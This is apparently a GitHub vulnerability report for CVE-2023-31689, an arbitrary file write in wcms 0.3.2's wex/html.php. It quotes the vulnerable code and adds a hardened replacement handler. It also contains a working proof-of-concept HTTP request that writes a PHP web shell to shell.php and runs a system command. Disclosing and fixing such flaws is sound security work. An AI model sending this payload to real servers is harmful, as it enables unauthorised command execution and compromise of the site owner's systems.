CVE-2023-31689: Arbitrary file write vulnerability in /wcms/wex/html.php · Issue #15 · vedees/wcms
In Wcms 0.3.2, an attacker can send a crafted request to the vulnerable endpoint /wcms/wex/html.php on the web application backend server via the finish parameter and the textAreaCode parameter. The request writes an arbitrary string to an attacker-chosen file name, which allows uploading arbitrary files and writing malicious code that is executed as a script, resulting in command execution.
Hi, dev team! The code in this file is vulnerable to arbitrary file write, and commands can be executed through the written file.
Vulnerability discovery
The vulnerable code is on lines 20 to 23 of the /wcms/wex/html.php file:
```php
// Vulnerable as shipped: the target path and the content both come straight
// from the request, with no authentication, path restriction or content check.
if (isset($_GET['finish'])) {
    $path = $_GET['finish'];
    file_put_contents($path, $_POST['textAreaCode']);
}
```
Because the finish parameter of the GET request and the textAreaCode parameter of the POST request are both attacker-controlled, file_put_contents writes attacker-supplied content to a file name of the attacker's choosing.
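As an added illustration of how this handler could be hardened (this is example code, not code from the wcms project), the snippet below keeps the same request shape (`?finish=` plus a POST `textAreaCode` field) but restricts the write to an allow-listed file name inside a fixed template directory, rejects script extensions and path traversal, requires an authenticated admin session and a CSRF token, and writes atomically. The template directory, the allowed extensions, the `admin` session key and the `csrf` field are assumptions for this example, not wcms identifiers.

```php
<?php
// Added example: a hardened replacement for the file_put_contents call in wex/html.php.
// Assumptions (not from the project): editable templates live under TEMPLATE_DIR,
// only .html/.htm files may be written there, and $_SESSION['admin'] / 'csrf'
// stand in for whatever session keys the application really uses.
declare(strict_types=1);

const TEMPLATE_DIR = __DIR__ . '/templates'; // assumed storage directory (ideally outside the web root)
const ALLOWED_EXT  = ['html', 'htm'];        // assumed allow-list; never .php, .phtml, .htaccess, ...

// Map a requested name onto a safe absolute path, or return null if it is not acceptable.
function safeTemplatePath(string $requested): ?string
{
    // Only a plain file name is accepted: basename() must not change it (no '/', '..', etc.)
    // and NUL bytes are rejected before the regex ever runs.
    if ($requested === '' || strpos($requested, "\0") !== false || basename($requested) !== $requested) {
        return null;
    }
    // Strict allow-list on characters and extension; this is what blocks "shell.php".
    $pattern = '/^[A-Za-z0-9_\-]+\.(' . implode('|', ALLOWED_EXT) . ')$/';
    if (!preg_match($pattern, $requested)) {
        return null;
    }
    $base = realpath(TEMPLATE_DIR);
    if ($base === false || !is_dir($base)) {
        return null; // storage directory missing: refuse rather than create files elsewhere
    }
    return $base . DIRECTORY_SEPARATOR . $requested;
}

// Handle the save request; returns the HTTP status code the caller should send.
function handleSave(array $get, array $post, array $session): int
{
    // Writing templates is an administrative action: require a logged-in admin
    // (session key is a placeholder) and a CSRF token bound to the session.
    if (empty($session['admin'])) {
        return 403;
    }
    if (!isset($post['csrf'], $session['csrf']) || !hash_equals((string) $session['csrf'], (string) $post['csrf'])) {
        return 403;
    }
    if (!isset($get['finish'], $post['textAreaCode'])) {
        return 400;
    }
    $path = safeTemplatePath((string) $get['finish']);
    if ($path === null) {
        return 400; // rejected name: log this, it is the signature of the attack described above
    }
    // Atomic write: temp file plus rename, so a partial write never becomes the live template.
    $tmp = $path . '.tmp';
    if (file_put_contents($tmp, (string) $post['textAreaCode'], LOCK_EX) === false || !rename($tmp, $path)) {
        return 500;
    }
    return 200;
}

// Entry point when served by PHP; the request shape is unchanged from the original handler.
if (PHP_SAPI !== 'cli') {
    session_start();
    http_response_code(handleSave($_GET, $_POST, $_SESSION));
}
```

With this in place the request from the report is refused with 400 before anything touches the filesystem, because `shell.php` fails the extension allow-list, and an unauthenticated sender is refused with 403 even earlier. Logging the rejected `finish` value from `handleSave` gives defenders a simple detection signal for attempts against this endpoint.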
Constructing the PoC
Use the controllable parameters to write malicious code into a shell.php file in the current directory.
The payload is as follows:
```http
POST /wangmarket-master/wcms-0.3.2/wcms/wex/html.php?finish=shell.php HTTP/1.1
Host: 192.168.3.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=pdvblj8k9q6rin0oroe36m6s77
Upgrade-Insecure-Requests: 1
Content-Length: 36

textAreaCode=<?php system('whoami');?>
```
The response shows that the write succeeded.
Getting a shell
Accessing the written file shows that the malicious code is executed and its output is echoed back.